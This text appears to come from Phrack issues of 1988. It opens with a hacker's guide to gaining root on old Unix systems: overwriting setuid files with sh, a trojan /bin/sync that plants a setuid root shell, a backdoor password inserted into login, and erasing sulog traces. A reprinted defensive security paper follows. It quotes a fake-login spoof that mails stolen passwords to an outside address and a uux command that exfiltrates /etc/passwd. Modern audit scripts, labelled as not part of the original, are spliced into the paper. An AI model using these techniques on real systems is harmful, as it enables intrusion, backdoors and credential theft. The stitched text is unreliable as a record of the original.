uid and euid. (BSD: whoami; >/tmp/xxxx;ls -l /tmp/xxxx will tell you your 
id [whoami] and your euid [ls -l].), terribly useful for checking on setuid 
programs to see if you have root euid privs. Also, do this: 

$ find / -perm -4000 -exec /bin/ls -lad {} ";" 
Yes, this finds and does an extended list of all the files that have the 
setuid bit on them, like /bin/login, /bin/passwd, and so on. If any of 
them look nonstandard, play with them, you never can tell what a *| will do 
to them sometimes. Also, if any are writeable and executable, copy sh over 
them, and you’ll have a setuid root shell. Just be sure to copy whatever 
was there back, otherwise your stay will probably be shortened a bit. 


-What, you have the bin passwd? 


Well, game over. You have control of the system. Everything in the bin 
directory is owned by bin (with the exception of a few things), so you can 
modify them at will. Since cron executes a few programs as root every once 
in a while, such as /bin/sync, try this: 


main() 
{ 
if (getuid()==0 || getuid()==0) { 
system("cp /bin/sh /tmp/sroot"); 
system("chmod 4777 /tmp/sroot");  } 
sync(); 
} 
$ cc file.c 
$ cp /bin/sync /tmp/sync.old 
$ mv a.out /bin/sync 
$ rm file.c 


Now, as soon as cron runs /bin/sync, you’ll have a setuid shell in 
/tmp/sroot. Feel free to hide it. 


-the ’at’ & ’cron’ commands: 


Look at the ’at’ dir. Usually /usr/spool/cron/atjobs. If you can run ’at’ 
(check by typing ’at’), and ’lasttimedone’ is writable, then: submit a 
blank ’at’ job, edit ’lasttimedone’ to do what you want it to do, and move 
lasttimedone over your entry (like 88.00.00.00). Then the commands you put 
in lasttimedone will be run as that file’s owner. Cron: in 
/usr/spool/cron/cronjobs, there is a list of people running cron jobs. 
Cat root’s, and see if he runs any of the programs owned by you (Without 
doing a su xxx -c "xxx"). For that matter, check all the crons. If you can 
take one system login, you should be able to get the rest, in time. 


-The disk files. 


These are rather odd. If you have read permission on the disks in /dev, 
then you can read any file on the system. All you have to do is find it in 
there somewhere. If the disk is writeable, if you use /etc/fsdb, you can 
modify any file on the system into whatever you want, such as by changing 
the permissions on /bin/sh to 4555. Since this is pretty difficult to 
understand (and I don’t get it fully), then I won’t bother with it any 
more. 


-Trivial su. 


You know with su you can log into anyone else’s account if you know their 
passwords or if you’re root. There are still a number of system 5’s that 
have uid 0, null passwd, rsh accounts on them. Just be sure to remove your 
entry in /usr/adm/sulog. 


-Trojan horses? On Unix? 


Yes, but because of the shell variable PATH, we are generally out of luck, 
because it usually searches /bin and /usr/bin first. However, if the first 
field is a colon, files in the present directory are searched first. Which 
means if you put a modified version of ’ls’ there, hey. If this isn’t the 
case, you will have to try something more blatant, like putting it in a 
game (see Shooting Shark’s file a while back). If you have a system login, 
you may be able to get something done like that. See cron. 


Taking over: 


Once you have root privs, you should read all the mail in /usr/mail, just 
to be sure nothing interesting is up, or anyone is passing another system’s 
passwds about. You may want to add another entry to the passwd file, but 
that’s relatively dangerous to the life of your machine. Be sure not to 
have anything out of the ordinary as the entry (i.e., No uid 0). 


Get a copy of the login program (available at your nearest decent BBS, I 
hope) of that same version of Unix, and modify it a bit: on system 5, 
here’s a modification pretty common: in the routine to check correct 
passwds, on the line before the actual pw check, put a 
if (!(strcmp(pswd,"woof"))) return(1); to check for your ’backdoor’, enabling 
you to log on as any valid user that isn’t uid 0 (On system 5). 


Neato things: 


Have you ever been on a system that you couldn’t get root or read the 
Systems/L.sys file? Well, this is a cheap way to overcome it: ’uuname’ 
will list all machines reachable by your Unix, then (Assuming they aren’t 
Direct, and the modem is available): 

$ cu -d host.you.want [or] 
$ uucico -x99 -r1 -shost.you.want 
Both will do about the same for us. This will fill your screen with lots 
of trivial material, but will eventually get to the point of printing the 
phone number to the other system. -d enables the cu diagnostics, -x99 
enables the uucico highest debug, and -r1 says ’uucp master’. 


Back a year or two, almost everywhere had their uucp passwd set to the same 
thing as their nuucp passwd (Thanks to the Systems file), so it was a 
breeze getting in. Even nowadays, some places do it.. You never can tell. 


-Uucp: 


I personally don’t like the uucp things. Uucico and uux are limited by the 
Permissions file, and in most cases, that means you can’t do anything 
except get & take from the uucppublic dirs. Then again, if the 
permission/L.cmd is blank, you should be able to take what files that you 
want. I still don’t like it. 


-Sending mail: 


Sometimes, the mail program checks only the shell var LOGNAME, so change 
it, export it, and you may be able to send mail as anyone. (Mainly early 
system 5’s.) 
$ LOGNAME="root";export LOGNAME 


-Printing out all the files on the system: 


Useful if you’re interested in the filenames. 

$ find / -print >file_list& 
And then do a ’grep text file_list’ to find any files with ’text’ in their 
names. Like grep [.]c file_list, grep host file_list.... 


-Printing out all restricted files: 


Useful when you have root. As a normal user, do: 

$ find / -print >/dev/null& 
This prints out all nonaccessible directories, so become root and see what 
they are hiding. 


-Printing out all the files in a directory: 


Better looking than ls -R: 

$ find . -print 
It starts at the present dir, and goes all the way down. Catches all 
files, too. 


-Rsh: 

Well in the case of having an account with rsh only, check your ’set’. If 
SHELL is not /bin/sh, and you are able to run anything with a shell escape 
(ex, ed, vi, write, mail...), you should be put into sh if you do a ’!sh’. 


If you have write permission on your .profile, change it, because rsh is 
run after checking profile. 


-Humor: 


On a system 5, do a: 
$ cat "food in cans" 


or on a csh, do: 

% hey unix, got a match? 


Well, I didn’t say it was great. 


Password hacking: 
-Salt: 


In a standard /etc/passwd file, passwords are 13 characters long. This is 
an 11 char encrypted passwd and a 2 char encryption modifier (salt), which 
is used to change the des algorithm in one of 4096<?> ways. Which means 
there is no decent way to go and reverse hack it. Yet. 


On normal system 5 Unix, passwords are supposed to be 6-8 characters long 
and have both numeric and alphabetic characters in them, which makes a 
dictionary hacker pretty worthless. However, if a user keeps insisting his 
password is going to be ’dog,’ usually the system will comply (depending on 
version). I have yet to try it, but having the hacker try the normal 
entry, and then the entry terminated by [0-9] is said to have remarkable 
results, if you don’t mind the 10-fold increase in time. 


Final notes: 


Yes, I have left a lot out. That seems to be the rage nowadays.. If you 
have noticed something wrong, or didn’t like this, feel free to tell me. 
If you can find me. 


Hi Ho. Here ends part one. <Of one?> 


Produced and directed by: Urvile & Necron 99 
(c) ToK inc., 1988 
==Phrack Inc.== 


Volume Two, Issue 18, Phile #7 of 11 


"Unix System Security Issues" 
Typed by: 
Whisky 
(from Holland, Europe) 


From 
Information Age 
Vol. 11, Number 2, April 1988 
Written By: 
Michael J. Knox and Edward D. Bowden 


Note: This file was sent to me from a friend in Holland. I felt 
that it would be a good idea to present this file to the 
UNIX-hacker community, to show that hackers don’t always 
harm systems, but sometimes look for ways to secure flaws 
in existing systems. Jester Sluggo !! 


There are a number of elements that have led to the popularity of the Unix 
operating system in the world today. The most notable factors are its 
portability among hardware platforms and the interactive programming 
environment that it offers to users. In fact, these elements have had much to 
do with the successful evolution of the Unix system in the commercial market 
place. (1, 2) 

As the Unix system expands further into industry and government, the need to 
handle Unix system security will no doubt become imperative. For example, the 
US government is committing several million dollars a year for the Unix system 
and its supported hardware. (1) The security requirements for the government 
are tremendous, and one can only guess at the future needs of security in 
industry. 

In this paper, we will cover some of the more fundamental security risks in 
the Unix system. Discussed are common causes of Unix system compromise in 
such areas as file protection, password security, networking and hacker 
violations. In our conclusion, we will comment upon ongoing effects in Unix 
system security, and their direct influence on the portability of the Unix 
operating system. 


FILE AND DIRECTORY SECURITY 


In the Unix operating system environment, files and directories are organized 
in a tree structure with specific access modes. The setting of these modes, 
through permission bits (as octal digits), is the basis of Unix system 
security. Permission bits determine how users can access files and the type 
of access they are allowed. There are three user access modes for all Unix 
system files and directories: the owner, the group, and others. Access to 
read, write and execute within each of the user types is also controlled by 
permission bits (Figure 1). Flexibility in file security is convenient, but 
it has been criticized as an area of system security compromise. 


                    Permission modes 

          OWNER          GROUP          OTHERS 
           rwx      :     rwx      :     rwx 
          r=read        w=write        x=execute 

-rw--w-r-x 1 bob csc532 70 Apr 23 20:10 file 
drwx------ 2 sam Al      2 May 01 12:01 directory 

FIGURE 1. File and directory modes: File shows Bob as the owner, with read 
and write permission. Group has write permission, while Others has read and 
execute permission. The directory gives a secure directory not readable, 
writeable, or executable by Group and Others. 


Since the file protection mechanism is so important in the Unix operating 
system, it stands to reason that the proper setting of permission bits is 
required for overall security. Aside from user ignorance, the most common 
area of file compromise has to do with the default setting of permission bits 
at file creation. In some systems the default is octal 644, meaning that only 
the file owner can write and read to a file, while all others can only read 
it. (3) In many "open" environments this may be acceptable. However, in 
cases where sensitive data is present, the access for reading by others should 
be turned off. The file utility umask does in fact satisfy this requirement. 
A suggested setting, umask 027, would enable all permission for the file 
owner, disable write permission to the group, and disable permissions for all 
others (octal 750). By inserting this umask command in a user .profile or 
.login file, the default will be overwritten by the new settings at file 
creation. 

The CHMOD utility can be used to modify permission settings on files and 
directories. Issuing the following command, 


chmod u+rwx,g+rx,g-w,o-rwx file 


will provide the file with the same protection as the umask above (octal 750). 
Permission bits can be relaxed with chmod at a later time, but at least 
initially, the file structure can be made secure using a restrictive umask. 
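
An added example (not part of the original paper) that decodes mode strings
like the ones in Figure 1 and then measures what umask 022 and 027 actually
produce. The function names are this example's own. It shows that the 750
quoted above applies to directories and executables; a newly created regular
file starts from 666 and comes out as 640.

```sh
#!/bin/sh
# Added example: names below are illustrative, not from the paper.

# perm_to_octal MODESTRING
# Convert the first column of `ls -l` (e.g. "-rw--w-r-x") into four octal
# digits: special bits (setuid=4, setgid=2, sticky=1), owner, group, others.
perm_to_octal() {
    p=$(printf '%s' "$1" | cut -c2-10)      # drop the file-type character
    if [ "${#p}" -ne 9 ]; then
        echo "bad mode string: $1" >&2
        return 1
    fi
    special=0
    digits=
    for triad in 1 2 3; do
        start=$(( (triad - 1) * 3 + 1 ))
        t=$(printf '%s' "$p" | cut -c"$start-$((start + 2))")
        d=0
        case $t in r??) d=$((d + 4)) ;; esac
        case $t in ?w?) d=$((d + 2)) ;; esac
        case $t in
            ??x)    d=$((d + 1)) ;;
            # lower-case s/t: special bit set AND execute set
            ??[st]) d=$((d + 1)); special=$((special + (4 >> (triad - 1)))) ;;
            # upper-case S/T: special bit set, execute NOT set
            ??[ST]) special=$((special + (4 >> (triad - 1)))) ;;
        esac
        digits=$digits$d
    done
    printf '%s%s\n' "$special" "$digits"
}

# modes_under_umask UMASK
# Create one regular file and one directory under UMASK in a scratch
# directory and print the modes they really received. Runs in a subshell
# so the caller's umask is untouched.
modes_under_umask() (
    scratch=$(mktemp -d) || exit 1
    chmod g-s "$scratch"                    # avoid inheriting a setgid bit
    umask "$1"
    : > "$scratch/file"
    mkdir "$scratch/dir"
    f=$(ls -ld "$scratch/file" | cut -c1-10)
    d=$(ls -ld "$scratch/dir" | cut -c1-10)
    printf 'file=%s dir=%s\n' "$(perm_to_octal "$f")" "$(perm_to_octal "$d")"
    rm -rf "$scratch"
)

perm_to_octal "-rw--w-r-x"      # the file in Figure 1
perm_to_octal "drwx------"      # the directory in Figure 1
modes_under_umask 022           # a common permissive default
modes_under_umask 027           # the setting the paper suggests
```
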

By responsible application of such utilities as umask and chmod, users can 
enhance file system security. The Unix system, however, restricts the 
security defined by the user to only owner, group and others. Thus, the owner 
of the file cannot designate file access to specific users. As Kowack and 
Healy have pointed out, "The granularity of control that (file security) 
mechanisms is often insufficient in practice (...) it is not possible to grant 
one user write protection to a directory while granting another read 
permission to the same directory." (4) A useful file security 
extension to the Unix system might be Multics style access control lists. 

With access mode vulnerabilities in mind, users should pay close attention 
to files and directories under their control, and correct permissions whenever 
possible. Even with the design limitations in mode granularity, following a 
safe approach will ensure a more secure Unix system file structure. 


SUID and SGID 


The set user id (suid) and set group id (sgid) identify the user and group 
ownership of a file. By setting the suid or sgid permission bits of an 
executable file, other users can gain access to the same resources (via the 
executable file) as that of the real file’s owner. 


For Example: 


Let Bob’s program bob.x be an executable file accessible to others. When Mary 
executes bob.x, Mary becomes the new program owner. If during program 
execution bob.x requests access to file browse.txt, then Mary must have 
previous read or write permission to browse.txt. This would allow Mary and 
everyone else total access to the contents of browse.txt, even when she is not 
running bob.x. By turning on the suid bit of bob.x, Mary will have the same 
access permissions to browse.txt as does the program’s real owner, but she 
will only have access to browse.txt during the execution of bob.x. Hence, by 
incorporating suid or sgid, unwelcome browsers will be prevented from 
accessing files like browse.txt. 


Although this feature appears to offer substantial access control to Unix 
system files, it does have one critical drawback. There is always the chance 
that the superuser (system administrator) may have a writable file for others 
that is also set with suid. With some modification in the file’s code (by a 
hacker), an executable file like this would enable a user to become a 
superuser. Within a short period of time this violator could completely 
compromise system security and make it inaccessible, even to other superusers. 
As Farrow (5) puts it, "(...) having a set-user-id copy of the shell owned by 
root is better than knowing the root password". 

To compensate for this security threat, writable suid files should be sought 
out and eliminated by the system administrator. Reporting of such files by 
normal users is also essential in correcting existing security breaches. 
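
An added example (not part of the original paper) of the search the paragraph
above asks administrators to run. The function names and the constructed
directory tree are this example's own. Beyond files that are themselves
writable, it also reports suid/sgid files sitting in a directory that group
or others can write to, because such a file can be replaced even when it
cannot be modified; a directory with the sticky bit set is assumed to block
that replacement.

```sh
#!/bin/sh
# Added example: names and the demo tree are constructed for illustration.

# loose PATH: succeed when group or others have write permission on PATH.
loose() {
    [ -n "$(find "$1" -prune \( -perm -020 -o -perm -002 \) -print 2>/dev/null)" ]
}

# sticky PATH: succeed when PATH has the sticky bit (only a file's owner may
# remove or rename entries in such a directory).
sticky() {
    [ -n "$(find "$1" -prune -perm -1000 -print 2>/dev/null)" ]
}

# audit_setid DIR...
# Report every set-uid or set-gid regular file below DIR that is
#   WRITABLE-FILE  writable by group or others, or
#   WRITABLE-DIR   stored in a group/other-writable, non-sticky directory.
audit_setid() {
    find "$@" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null |
    while IFS= read -r f; do
        if loose "$f"; then
            printf 'WRITABLE-FILE %s\n' "$f"
        fi
        dir=$(dirname "$f")
        if loose "$dir" && ! sticky "$dir"; then
            printf 'WRITABLE-DIR  %s\n' "$f"
        fi
    done
}

# demo: build a constructed tree with one clean and three interesting cases,
# audit it, and clean up. Empty files are enough; nothing is executed.
demo() (
    t=$(mktemp -d) || exit 1
    cd "$t" || exit 1
    mkdir ok bad open sticky
    for d in ok bad open sticky; do
        : > "$d/tool"
        chmod 4755 "$d/tool"
    done
    chmod 4775 bad/tool         # suid and group-writable
    chmod 755 ok bad
    chmod 777 open              # anyone can replace open/tool
    chmod 1777 sticky           # world-writable but sticky
    : > ok/notes
    chmod 666 ok/notes          # writable, but not suid: not reported
    audit_setid . | LC_ALL=C sort
    cd / && rm -rf "$t"
)

demo
```

On a real system the call would be `audit_setid /` run by the administrator; `-xdev` keeps the search on one filesystem.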


DIRECTORIES 


Directory protection is a commonly overlooked component of file security in 
the Unix system. Many system administrators and users are unaware of the fact 
that "publicly writable directories provide the most opportunities for 
compromising the Unix system security" (6). Administrators tend to make these 
"open" for users to move around and access public files and utilities. This 
can be disastrous, since files and other subdirectories within writable 
directories can be moved out and replaced with different versions, even if 
contained files are unreadable or unwritable to others. When this happens, an 
unscrupulous user or a "password breaker" may supplant a Trojan horse of a 
commonly used system utility (e.g. ls, su, mail and so on). 


For example: 


Imagine that the /bin directory is publicly writable. The perpetrator could 
first remove the old su version (with rm utility) and then include his own 
fake su to read the password of users who execute this utility. 


Although writable directories can destroy system integrity, readable ones 
can be just as damaging. Sometimes files and directories are configured to 
permit read access by others. This subtle convenience can lead to unauthorized 
disclosure of sensitive data: a serious matter when valuable information is 
lost to a business competitor. 

As a general rule, therefore, read and write access should be removed from 
all but system administrative directories. Execute permission will allow 
access to needed files; however, users might explicitly name the file they 
wish to use. This adds some protection to unreadable and unwritable 
directories. So, programs like lp file.x in an unreadable directory /ddr will 
print the contents of file.x, while ls /ddr would not list the contents of that 
directory. 


PATH VARIABLE 


PATH is an environment variable that points to a list of directories, which 
are searched when a file is requested by a process. The order of that search 
is indicated by the sequence of the listed directories in the PATH name. This 
variable is established at user logon and is set up in the user’s .profile or 
.login file. 

If a user places the current directory as the first entry in PATH, then 
programs in the current directory will be run first. Programs in other 
directories with the same name will be ignored. Although file and directory 
access is made easier with a PATH variable set up this way, it may expose the 
user to pre-existing Trojan horses. 

To illustrate this, assume that a Trojan horse, similar to the cat utility, 
contains an instruction that imparts access privileges to a perpetrator. The 
fake cat is placed in a public directory /usr/his where a user often works. 
Now if the user has a PATH variable with the current directory first, and he 
enters the cat command while in /usr/his, the fake cat in /usr/his would be 
executed but not the system cat located in /bin. 

In order to prevent this kind of system violation, the PATH variable must be 
correctly set. First, if at all possible, exclude the current directory as 
the first entry in the PATH variable and type the full path name when invoking 
Unix system commands. This enhances file security, but is more cumbersome to 
work with. Second, if the working directory must be included in the PATH 
variable, then it should always be listed last. In this way, utilities like 
vi, cat, su and ls will be executed first from systems directories like /bin 
and /usr/bin before searching the user’s working directory. 
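
An added example (not part of the original paper) that checks a PATH value
against the two rules above. The function name, the labels it prints and the
constructed directories are this example's own. It treats an empty field
(leading colon, trailing colon or "::") as the current directory, just like
".", and goes one step beyond the text by also reporting relative entries and
PATH directories that group or others can write to, since a fake cat can be
planted there as easily as in /usr/his.

```sh
#!/bin/sh
# Added example: names and sample directories are constructed for illustration.

# audit_path PATHSTRING
# Print one line per risky entry: "<position> <finding> "<entry>"".
#   cwd-before-others  current directory searched ahead of later entries
#   cwd-last           current directory present, but searched last
#   relative           entry resolved against whatever directory you are in
#   writable-dir       group or others may create files in this directory
audit_path() {
    total=$(( $(printf '%s' "$1" | tr -cd ':' | wc -c) + 1 ))
    rest=$1:                    # sentinel colon so a trailing empty field counts
    n=0
    while [ -n "$rest" ]; do
        entry=${rest%%:*}       # text before the first colon
        rest=${rest#*:}         # everything after it
        n=$((n + 1))
        case $entry in
            ''|.)
                if [ "$n" -lt "$total" ]; then
                    printf '%d cwd-before-others "%s"\n' "$n" "$entry"
                else
                    printf '%d cwd-last "%s"\n' "$n" "$entry"
                fi ;;
            /*)
                # "$entry/." makes find look at the directory a symlink points to
                if [ -d "$entry" ] &&
                   [ -n "$(find "$entry/." -prune \( -perm -020 -o -perm -002 \) -print 2>/dev/null)" ]; then
                    printf '%d writable-dir "%s"\n' "$n" "$entry"
                fi ;;
            *)
                printf '%d relative "%s"\n' "$n" "$entry" ;;
        esac
    done
}

# demo: audit a constructed PATH that breaks every rule once. The scratch
# prefix is rewritten to /SCRATCH so the output is stable.
demo() (
    t=$(mktemp -d) || exit 1
    mkdir "$t/safe" "$t/shared"
    chmod 755 "$t/safe"
    chmod 777 "$t/shared"
    audit_path ":$t/safe:$t/shared:bin:." | sed "s|$t|/SCRATCH|"
    rm -rf "$t"
)

demo
```

Running `audit_path "$PATH"` checks the live value; a line starting with `cwd-before-others` is the exact situation the fake-cat scenario relies on.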


PASSWORD SECURITY 


User authentication in the Unix system is accomplished by personal passwords. 
Though passwords offer an additional level of security beyond physical 
constraints, they lend themselves to the greatest area of computer system 
compromise. Lack of user awareness and responsibility contributes largely to 
this form of computer insecurity. This is true of many computer facilities 
where password identification, authentication and authorization are required 
for the access of resources - and the Unix operating system is no exception. 

Password information in many time-sharing systems is kept in restricted 
files that are not ordinarily readable by users. The Unix system differs in 
this respect, since it allows all users to have read access to the /etc/passwd 
file (FIGURE 2) where encrypted passwords and other user information are 
stored. Although the Unix system implements a one-way encryption method, and 
in most systems a modified version of the data encryption standard (DES), 
password breaking methods are known. Among these methods, brute-force attacks 
are generally the least effective, yet techniques involving the use of 
heuristics (good guesses and knowledge about passwords) tend to be successful. 
For example, the /etc/passwd file contains such useful information as the 
login name and comments fields. Login names are especially rewarding to the 
"password breaker" since many users will use login variants for passwords 
(backward spelling, the appending of a single digit etc.). The comment field 
often contains items such as surname, given name, address, telephone number, 
project name and so on. To quote Morris and Grampp (7) in their landmark 
paper on Unix system security: 


[in the case of logins] 


The authors made a survey of several dozen local machines, using as trial 
passwords a collection of the 20 most common female first names, each 
followed by a single digit. The total number of passwords tried was, 
therefore, 200. At least one of these 200 passwords turned out to be a 
valid password on every machine surveyed. 


[as for comment fields] 


(...) if an intruder knows something about the people using a machine, a 
whole new set of candidates is available. Family and friend’s names, auto 
registration numbers, hobbies, and pets are particularly productive 
categories to try interactively in the unlikely event that a purely 
mechanical scan of the password file turns out to be disappointing. 


Thus, given a persistent system violator, there is strong evidence that he 
will find some information about users in the /etc/passwd file. With this in 
mind, it is obvious that a password file should be unreadable to everyone 
except those in charge of system administration. 


root:aN2z061SmxKqQ:0:10:(Boss1),656-35-0989:/:/bin 
mike:9okduHy7sdLK8:09:122:No.992-3943:/usr:/bin 


FIGURE 2. The /etc/passwd file. Note the comments field as underlined terms. 


Resolution of the /etc/passwd file’s readability does not entirely solve the 
basic problem with passwords. Educating users and administrators is necessary 
to assure proper password utilization. First, "good passwords are those that 
are at least six characters long, aren’t based on personal information, and 
have some non-alphabetic (especially control) characters in them: 4score, 
my_name, luv2run" (8). Secondly, passwords should be changed periodically but 
users should avoid alternating between two passwords. Different passwords for 
different machines and files will aid in protecting sensitive information. 
Finally, passwords should never be available to unauthorized users. Reduction 
of user ignorance about poor password choice will inevitably make a system 
more secure. 
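
An added example (not part of the original paper) of an administrator's audit
of a password file in the seven-field layout of Figure 2. The function name,
the messages and the sample entries are constructed for this example. It
assumes the file being checked is the world-readable /etc/passwd and that a
13-character field drawn from the crypt alphabet is a salted hash.

```sh
#!/bin/sh
# Added example: the entries fed to demo are constructed, not real accounts.

# audit_passwd [FILE...]
# Read passwd-format lines (from FILE or standard input) and report:
#   - accounts with an empty password field
#   - crypt hashes stored where every user can read them
#   - accounts other than root that carry uid 0
#   - comment fields holding phone/ID-like numbers, the kind of personal
#     detail the paper says feeds password guessing
audit_passwd() {
    awk -F: '
        NF != 7 {
            printf "line %d: malformed (%d fields)\n", NR, NF
            next
        }
        $2 == "" {
            printf "%s: empty password field\n", $1
        }
        length($2) == 13 && $2 ~ "^[./0-9A-Za-z]+$" {
            printf "%s: crypt hash readable by every user (salt %s)\n", $1, substr($2, 1, 2)
        }
        $3 ~ "^0+$" && $1 != "root" {
            printf "%s: uid 0 but not root\n", $1
        }
        $5 ~ "[0-9][0-9][0-9]-[0-9]" {
            printf "%s: comment field holds a phone/ID-like number\n", $1
        }
    ' "$@"
}

# demo: run the audit over five constructed lines, one per finding plus a
# truncated line.
demo() {
    audit_passwd <<'EOF'
root:Ab1cdEfGhIjKl:0:1:Operator,555-0100:/:/bin/sh
mike:Zz9yXwVuTsRqP:109:122:Mike:/usr/mike:/bin/sh
guest::200:50:Guest:/usr/guest:/bin/sh
admin2:*:0:1:Spare:/:/bin/sh
truncated:line
EOF
}

demo
```
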


NETWORK SECURITY 


UUCP system 

The most common Unix system network is the UUCP system, which is a group of 
programs that perform the file transfers and command execution between remote 
systems. (3) The problem with the UUCP system is that users on the network 
user. It is up to the individual sites to be aware of this, and apply the 
protections that they feel are necessary. 

There are four UUCP system commands to consider when looking into network 
security with the Unix system. The first is uucp, a command used to copy 
files between two Unix systems. If uucp is not properly implemented by the 
system administrator, any outside user can execute remote commands and copy 
files from another login user. If the file name on another system is known, 
one could use the uucp command to copy files from that system to their system. 
For example: 


$ uucp system2!/main/src/hisfile myfile 


will copy hisfile from system2 in the directory /main/src to the file myfile 
in the current local directory. If file transfer restrictions exist on either 
system, hisfile would not be sent. If there are no restrictions, any file 
could be copied from a remote user - including the password file. The 
following would copy the remote system /etc/passwd file to the local file 
thanks: 


$ uucp system2!/etc/passwd thanks 


System administrators can address the uucp matter by restricting uucp file 
transfers to the directory /usr/spool/uucppublic. (8) If one tries to 
transfer a file anywhere else, a message will be returned saying "remote 
access to path/file denied" and no file transfer will occur. 

The second UUCP system command to consider is the uux. Its function is to 
execute commands on remote Unix computers. This is called remote command 
execution and is most often used to send mail between systems (mail executes 
the uux command internally). 

The ability to execute a command on another system introduces a serious 
security problem if remote command execution is not limited. As an example, a 
system should not allow users from another system to perform the following: 


$ uux "system1!cat</etc/passwd>/usr/spool/uucppublic" 


which would cause system1 to send its /etc/passwd file to the system2 uucp 
public directory. The user of system2 would now have access to the password 
file. Therefore, only a few commands should be allowed to execute remotely. 
Often the only command allowed to run uux is rmail, the restricted mail 
program. 

The third UUCP system function is the uucico (copy in / copy out) program. 
It performs the true communication work. Uucp or uux does not actually call 
up other systems; instead they are queued and the uucico program initiates the 
remote processes. The uucico program uses the file /usr/uucp/USERFILE to 
determine what files a remote system may send or receive. Checks for legal 
files are the basis for security in USERFILE. Thus the system administrator 
should carefully control this file. 

In addition, USERFILE controls security between two Unix systems by allowing 
a call-back flag to be set. Therefore, some degree of security can be 
achieved by requiring a system to check if the remote system is legal before a 
call-back occurs. 

The last UUCP function is the uuxqt. It controls the remote command 
execution. The uuxqt program uses the file /usr/lib/uucp/L.cmd to determine 
which commands will run in response to a remote execution request. For 
example, if one wishes to use the electronic mail feature, then the L.cmd file 
will contain the line rmail. Since uuxqt determines what commands will be 
allowed to execute remotely, commands which may compromise system security 
should not be included in L.cmd. 


CALL THE UNIX SYSTEM 


In addition to UUCP network commands, one should also be cautious of the cu 
command (call the Unix system). Cu permits a remote user to call another 
computer system. The problem with cu is that a user on a system with a weak 
security can use cu to connect to a more secure system and then install a 
Trojan horse on the stronger system. It is apparent that cu should not be 
used to go from a weaker system to a stronger one, and it is up to the system 
administrator to ensure that this never occurs. 


LOCAL AREA NETWORKS 


With the increased number of computers operating under the Unix system, some 
consideration must be given to local area networks (LANs). Because LANs are 
designed to transmit files between computers quickly, security has not been a 
priority with many LANs, but there are secure LANs under development. It is 
the job of the system manager to investigate security risks when employing 
LANs. 


OTHER AREAS OF COMPROMISE


There are numerous methods used by hackers to gain entry into computer 
systems. In the Unix system, Trojan horses, spoofs and suids are the primary 
weapons used by trespassers. 

Trojan horses are pieces of code or shell scripts which usually assume the
role of a common utility but, when activated by an unsuspecting user, perform
some unexpected task for the trespasser. Among the many different Trojan
horses, it is the su masquerade that is the most dangerous to the Unix system.

Recall that the /etc/passwd file is readable to others, and also contains
information about all users - even root users. Consider what a hacker could
do if he were able to read this file and locate a root user with a writable
directory. He might easily plant a fake su that would send the root password
back to the hacker. A Trojan horse similar to this can often be avoided when
various security measures are followed, that is, an /etc/passwd file with
limited read access, controlling writable directories, and the PATH variable
properly set.

A spoof is basically a hoax that causes an unsuspecting victim to believe
that a masquerading computer function is actually a real system operation. A
very popular spoof in many computer systems is the terminal-login trap. By
displaying a phoney login format, a hacker is able to capture the user’s
password.

Imagine that a root user has temporarily deserted his terminal. A hacker 
could quickly install a login process like the one described by Morris and 
Grampp (7): 


     echo -n "login:"
     read X
     stty -echo
     echo -n "password:"
     read Y
     echo ""
     stty echo
     echo $X%$Y|mail outside|hacker&
     sleep 1
     echo Login incorrect
     stty 0>/dev/tty


We see that the password of the root user is mailed to the hacker who has 
completely compromised the Unix system. The fake terminal-login acts as if 
the user has incorrectly entered the password. It then transfers control over 
to the stty process, thereby leaving no trace of its existence. 

Prevention of spoofs, like most security hazards, must begin with user 
education. But an immediate solution to security is sometimes needed before
education can be effected. As for terminal-login spoofs, there are some 
keyboard-locking programs that protect the login session while users are away 
from their terminals. (8, 10) These locked programs ignore keyboard-generated 
interrupts and wait for the user to enter a password to resume the terminal 
session. 

Since the suid mode has been previously examined in the password section, we
merely indicate some suid solutions here. First, suid programs should be used
only if there are no other alternatives. Unrestrained suids or sgids can lead to
system compromise. Second, a "restricted shell" should be given to a process
that escapes from a suid process to a child process. The reason for this is
that a nonprivileged child process might inherit privileged files from its
parents. Finally, suid files should be writable only by their owners,
otherwise others may have access to overwrite the file contents.

It can be seen that by applying some basic security principles, a user can 
avoid Trojan horses, spoofs and inappropriate suids. There are several other 
techniques used by hackers to compromise system security, but the use of good 
judgement and user education may go far in preventing their occurrence. 
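
The measures named above against the fake-su Trojan horse (a properly set PATH, controlled writable directories) and the rule that suid files be writable only by their owners can be checked mechanically. The following Python audit is an added example, not part of the original paper; the function names, the trusted-uid list and the default scan directory are assumptions made for illustration.

```python
import os
import stat
import sys

CURRENT_DIR = "current directory in PATH"
LOOSE_DIR = "directory writable by group or others"
LOOSE_SETID = "set-id file writable by group or others"


def audit_path(path_value, trusted_uids=(0,)):
    """Return (entry, problem) pairs for unsafe components of a PATH string."""
    findings = []
    for entry in path_value.split(":"):
        # An empty component or "." makes the shell search the current
        # directory, so a program planted in whatever directory the user
        # happens to be in can run under the name of a trusted utility.
        if entry in ("", "."):
            findings.append((entry or "<empty>", CURRENT_DIR))
            continue
        if not os.path.isabs(entry):
            findings.append((entry, "relative directory in PATH"))
            continue
        try:
            st = os.stat(entry)
        except OSError:
            continue  # entry does not exist, nothing to inspect
        if not stat.S_ISDIR(st.st_mode):
            continue
        # Anyone who can write here can drop a fake su into the search path.
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((entry, LOOSE_DIR))
        if st.st_uid not in trusted_uids:
            findings.append((entry, "owned by uid %d" % st.st_uid))
    return findings


def setid_problem(mode):
    """Classify one st_mode value; return a problem string or None."""
    if not stat.S_ISREG(mode):
        return None
    if not mode & (stat.S_ISUID | stat.S_ISGID):
        return None
    # A set-id file that non-owners can write can have its contents replaced
    # while it keeps running with the owner's (or group's) privileges.
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        return LOOSE_SETID
    return None


def audit_setid(root):
    """Walk root and return (path, problem) pairs for loose set-id files."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                mode = os.lstat(full).st_mode  # lstat: never follow symlinks
            except OSError:
                continue
            problem = setid_problem(mode)
            if problem:
                findings.append((full, problem))
    return findings


if __name__ == "__main__":
    # Assumed defaults: audit this process's PATH and scan /usr/bin.
    root = sys.argv[1] if len(sys.argv) > 1 else "/usr/bin"
    me = (0, os.getuid())
    for entry, problem in audit_path(os.environ.get("PATH", ""), me):
        print("PATH  %-30s %s" % (entry, problem))
    for path, problem in audit_setid(root):
        print("SETID %-30s %s" % (path, problem))
```

Run it as the account being audited; a clean result prints nothing.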


